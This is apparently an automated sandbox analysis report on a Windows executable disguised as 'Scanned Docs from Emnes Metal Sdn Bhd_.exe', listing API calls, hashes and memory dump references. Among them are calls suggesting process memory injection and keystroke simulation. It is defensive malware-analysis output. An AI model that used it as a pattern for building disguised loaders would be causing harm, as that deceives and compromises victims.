                                                      • SelectObject.GDI32(?,00000000), ref: 00299603
                                                      • DeleteObject.GDI32 ref: 00299616
                                                      • StrokePath.GDI32(?), ref: 00299631
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 1f671382b2d2b0bd1b6ecd192df1a1ad731230aff86862e81c9b3d5cf7305521
                                                      • Instruction ID: c6d965618ea841e8254e40f4fcb83864df27d2763b233b65d2f63eda3c8fc143
                                                      • Opcode Fuzzy Hash: 1f671382b2d2b0bd1b6ecd192df1a1ad731230aff86862e81c9b3d5cf7305521
                                                      • Instruction Fuzzy Hash: 2FF01431066309EBDB235F69ED18BA93B6DAB09332F048228F465950F0C73089A1DFA4
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: e1bae960ced78503275a20e3b65c5b1346b27d74871074a6ebab8823c5f6efc7
                                                      • Instruction ID: 941bc45bfae2274b51a74db94584d7e4e36700e17844e7bba55fb2f4fd9f82a0
                                                      • Opcode Fuzzy Hash: e1bae960ced78503275a20e3b65c5b1346b27d74871074a6ebab8823c5f6efc7
                                                      • Instruction Fuzzy Hash: 13D10431930207CACB249F68C865BFEB7F0EF05380FA84199EA059B651E7759DB0CB91
                                                      APIs
                                                        • Part of subcall function 002A0242: EnterCriticalSection.KERNEL32(0035070C,00351884,?,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A024D
                                                        • Part of subcall function 002A0242: LeaveCriticalSection.KERNEL32(0035070C,?,0029198B,00352518,?,?,?,002812F9,00000000), ref: 002A028A
                                                        • Part of subcall function 002A00A3: __onexit.LIBCMT ref: 002A00A9
                                                      • __Init_thread_footer.LIBCMT ref: 00306238
                                                        • Part of subcall function 002A01F8: EnterCriticalSection.KERNEL32(0035070C,?,?,00298747,00352514), ref: 002A0202
                                                        • Part of subcall function 002A01F8: LeaveCriticalSection.KERNEL32(0035070C,?,00298747,00352514), ref: 002A0235
                                                        • Part of subcall function 002F359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002F35E4
                                                        • Part of subcall function 002F359C: LoadStringW.USER32(00352390,?,00000FFF,?), ref: 002F360A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                      • String ID: x#5$x#5$x#5
                                                      • API String ID: 1072379062-943734617
                                                      • Opcode ID: b3bf9249751b197238771bc43784ff4cef253623578a4aa4e403c5f35238eb24
                                                      • Instruction ID: 84d0e76792b02bf6de1f99256960223a38f57e0a339988b40ca43927dd23c4d3
                                                      • Opcode Fuzzy Hash: b3bf9249751b197238771bc43784ff4cef253623578a4aa4e403c5f35238eb24
                                                      • Instruction Fuzzy Hash: 0FC1B071A01209AFCB15DF58C8A1EBEB7B9FF49300F158069F9059B295DB70ED64CB90
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 002B8B6E
                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 002B8B7A
                                                      • __dosmaperr.LIBCMT ref: 002B8B81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                      • String ID: .*
                                                      • API String ID: 2434981716-1914541848
                                                      • Opcode ID: 99cd98fd006b50734ff25ef08c7ac71a6042067d9fdc59a5201b238d119df4e7
                                                      • Instruction ID: 0ae49d956b0d764d6333e683c664b15debfc0383ca770cbe50868dd9cfd1eda9
                                                      • Opcode Fuzzy Hash: 99cd98fd006b50734ff25ef08c7ac71a6042067d9fdc59a5201b238d119df4e7
                                                      • Instruction Fuzzy Hash: 6A417C70624145AFDB259F34CC90AF97FADDB45388F2885A9F89CC7152DE718C22C750
                                                      APIs
                                                        • Part of subcall function 002EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002E21D0,?,?,00000034,00000800,?,00000034), ref: 002EB42D
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002E2760
                                                        • Part of subcall function 002EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 002EB3F8
                                                        • Part of subcall function 002EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 002EB355
                                                        • Part of subcall function 002EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002E2194,00000034,?,?,00001004,00000000,00000000), ref: 002EB365
                                                        • Part of subcall function 002EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002E2194,00000034,?,?,00001004,00000000,00000000), ref: 002EB37B
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002E27CD
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002E281A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: b1ec0844cb9587325edc2fde5229eb96d3700f9dd8ab874c43cc73edd8457465
                                                      • Instruction ID: a5e50d14d5664ed4cd76b9e8a590684984a9261a0a941e9a89e9fafa12adbe84
                                                      • Opcode Fuzzy Hash: b1ec0844cb9587325edc2fde5229eb96d3700f9dd8ab874c43cc73edd8457465
                                                      • Instruction Fuzzy Hash: 04415E72940218AFDB11DFA5CD42AEEBBB8EF09300F004095FA45B7181DB706E99CFA1
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe,00000104), ref: 002B1769
                                                      • _free.LIBCMT ref: 002B1834
                                                      • _free.LIBCMT ref: 002B183E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                      • API String ID: 2506810119-1030716471
                                                      • Opcode ID: a2ff863ac178163d39195058ac6180a4c30641b2b63802eddf88ad2e5b266a75
                                                      • Instruction ID: e47858c30e15bd6c52074abddc6faf3c812f763701e4182506bf49c497751728
                                                      • Opcode Fuzzy Hash: a2ff863ac178163d39195058ac6180a4c30641b2b63802eddf88ad2e5b266a75
                                                      • Instruction Fuzzy Hash: 5231A071A10308EBDB22DF999885DDEBBFCEB85390F644166F804D7211DB708E60DB90
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 002EC306
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 002EC34C
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00351990,00D35900), ref: 002EC395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 2ada9df9b366d100a7c0c1b27f393276481e3714a9b792b5e4897c789ec00168
                                                      • Instruction ID: d55d9c040c265301a32ab017c530ad2ec3b82a2ccec7f5ce4151a8d1406cdd43
                                                      • Opcode Fuzzy Hash: 2ada9df9b366d100a7c0c1b27f393276481e3714a9b792b5e4897c789ec00168
                                                      • Instruction Fuzzy Hash: 874103312543829FD720DF66D844F5ABBE8AF85310F6086ADF8A5972D1C730E815CB62
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0031CC08,00000000,?,?,?,?), ref: 003144AA
                                                      • GetWindowLongW.USER32 ref: 003144C7
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003144D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: d1d589933b15f78110134fde54e1a91ee8d232691768edff38c2c4c6d69094a4
                                                      • Instruction ID: 6502a1e37ef88888bbf0596919732defaae95612c4c7332eeda79bd70a8b7779
                                                      • Opcode Fuzzy Hash: d1d589933b15f78110134fde54e1a91ee8d232691768edff38c2c4c6d69094a4
                                                      • Instruction Fuzzy Hash: 76319C31210205ABDB269E38DC45BEA7BA9EB0D334F214325F975921E0DB70ECA09B50
                                                      APIs
                                                      • SysReAllocString.OLEAUT32(?,?), ref: 002E6EED
                                                      • VariantCopyInd.OLEAUT32(?,?), ref: 002E6F08
                                                      • VariantClear.OLEAUT32(?), ref: 002E6F12
                                                      Strings
                                                      Similarity
                                                      • API ID: Variant$AllocClearCopyString
                                                      • String ID: *j.
                                                      • API String ID: 2173805711-2304742598
                                                      APIs
                                                        • Part of subcall function 0030335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00303077,?,?), ref: 00303378
                                                      • inet_addr.WSOCK32(?), ref: 0030307A
                                                      • _wcslen.LIBCMT ref: 0030309B
                                                      • htons.WSOCK32(00000000), ref: 00303106
                                                      Strings
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 946324512-2422070025
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00314705
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00314713
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0031471A
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 176396367-2734436370
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00313840
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00313850
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00313876
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F4A08
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002F4A5C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,0031CC08), ref: 002F4AD0
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      • API String ID: 2507767853-685833217
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0031424F
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00314264
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00314271
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      APIs
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                        • Part of subcall function 002E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002E2DC5
                                                        • Part of subcall function 002E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E2DD6
                                                        • Part of subcall function 002E2DA7: GetCurrentThreadId.KERNEL32 ref: 002E2DDD
                                                        • Part of subcall function 002E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002E2DE4
                                                      • GetFocus.USER32 ref: 002E2F78
                                                        • Part of subcall function 002E2DEE: GetParent.USER32(00000000), ref: 002E2DF9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 002E2FC3
                                                      • EnumChildWindows.USER32(?,002E303B), ref: 002E2FEB
                                                      Strings
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 1272988791-1110647743
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003158C1
                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003158EE
                                                      • DrawMenuBar.USER32(?), ref: 003158FD
                                                      Strings
                                                      Similarity
                                                      • API ID: Menu$InfoItem$Draw
                                                      • String ID: 0
                                                      • API String ID: 3227129158-4108050209
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      APIs
                                                      Similarity
                                                      • API ID: Variant$ClearInitInitializeUninitialize
                                                      • String ID:
                                                      • API String ID: 1998397398-0
                                                      APIs
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0031FC08,?), ref: 002E05F0
                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0031FC08,?), ref: 002E0608
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0031CC40,000000FF,?,00000000,00000800,00000000,?,0031FC08,?), ref: 002E062D
                                                      • _memcmp.LIBVCRUNTIME ref: 002E064E
                                                      Similarity
                                                      • API ID: FromProg$FreeTask_memcmp
                                                      • String ID:
                                                      • API String ID: 314563124-0
                                                      APIs
                                                      Similarity
                                                      • API ID: _free
                                                      APIs
                                                      • GetWindowRect.USER32(00D3EB78,?), ref: 003162E2
                                                      • ScreenToClient.USER32(?,?), ref: 00316315
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00316382
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00301AFD
                                                      • WSAGetLastError.WSOCK32 ref: 00301B0B
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00301B8A
                                                      • WSAGetLastError.WSOCK32 ref: 00301B94
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002F5783
                                                      • GetLastError.KERNEL32(?,00000000), ref: 002F57A9
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002F57CE
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002F57FA
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,002A6D71,00000000,00000000,002A82D9,?,002A82D9,?,00000001,002A6D71,?,00000001,002A82D9,002A82D9), ref: 002BD910
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002BD999
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002BD9AB
                                                      • __freea.LIBCMT ref: 002BD9B4
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00315352
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00315375
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00315382
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003153A8
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002EABF1
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 002EAC0D
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 002EAC74
                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002EACC6
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0031769A
                                                      • GetWindowRect.USER32(?,?), ref: 00317710
                                                      • PtInRect.USER32(?,?,00318B89), ref: 00317720
                                                      • MessageBeep.USER32(00000000), ref: 0031778C
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 003116EB
                                                        • Part of subcall function 002E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3A57
                                                        • Part of subcall function 002E3A3D: GetCurrentThreadId.KERNEL32 ref: 002E3A5E
                                                        • Part of subcall function 002E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E25B3), ref: 002E3A65
                                                      • GetCaretPos.USER32(?), ref: 003116FF
                                                      • ClientToScreen.USER32(00000000,?), ref: 0031174C
                                                      • GetForegroundWindow.USER32 ref: 00311752
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 002ED501
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 002ED50F
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 002ED52F
                                                      • CloseHandle.KERNEL32(00000000), ref: 002ED5DC
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • GetCursorPos.USER32(?), ref: 00319001
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002D7711,?,?,?,?,?), ref: 00319016
                                                      • GetCursorPos.USER32(?), ref: 0031905E
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002D7711,?,?,?), ref: 00319094
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0031CB68), ref: 002ED2FB
                                                      • GetLastError.KERNEL32 ref: 002ED30A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 002ED319
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0031CB68), ref: 002ED376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      APIs
                                                        • Part of subcall function 002E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002E102A
                                                        • Part of subcall function 002E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002E1036
                                                        • Part of subcall function 002E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1045
                                                        • Part of subcall function 002E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002E104C
                                                        • Part of subcall function 002E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1062
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002E15BE
                                                      • _memcmp.LIBVCRUNTIME ref: 002E15E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E1617
                                                      • HeapFree.KERNEL32(00000000), ref: 002E161E
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0031280A
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00312824
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00312832
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00312840
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      APIs
                                                        • Part of subcall function 002E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,002E790A,?,000000FF,?,002E8754,00000000,?,0000001C,?,?), ref: 002E8D8C
                                                        • Part of subcall function 002E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 002E8DB2
                                                        • Part of subcall function 002E8D7D: lstrcmpiW.KERNEL32(00000000,?,002E790A,?,000000FF,?,002E8754,00000000,?,0000001C,?,?), ref: 002E8DE3
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002E8754,00000000,?,0000001C,?,?,00000000), ref: 002E7923
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 002E7949
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,002E8754,00000000,?,0000001C,?,?,00000000), ref: 002E7984
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 003156BB
                                                      • _wcslen.LIBCMT ref: 003156CD
                                                      • _wcslen.LIBCMT ref: 003156D8
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00315816
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 002E1A47
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E1A59
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E1A6F
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E1A8A
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 002EE1FD
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 002EE230
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002EE246
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002EE24D
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,002ACFF9,00000000,00000004,00000000), ref: 002AD218
                                                      • GetLastError.KERNEL32 ref: 002AD224
                                                      • __dosmaperr.LIBCMT ref: 002AD22B
                                                      • ResumeThread.KERNEL32(00000000), ref: 002AD249
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
                                                      • GetStockObject.GDI32(00000011), ref: 00286060
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 002A3B56
                                                        • Part of subcall function 002A3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 002A3AD2
                                                        • Part of subcall function 002A3AA3: ___AdjustPointer.LIBCMT ref: 002A3AED
                                                      • _UnwindNestedFrames.LIBCMT ref: 002A3B6B
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 002A3B7C
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 002A3BA4
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,002813C6,00000000,00000000,?,002B301A,002813C6,00000000,00000000,00000000,?,002B328B,00000006,FlsSetValue), ref: 002B30A5
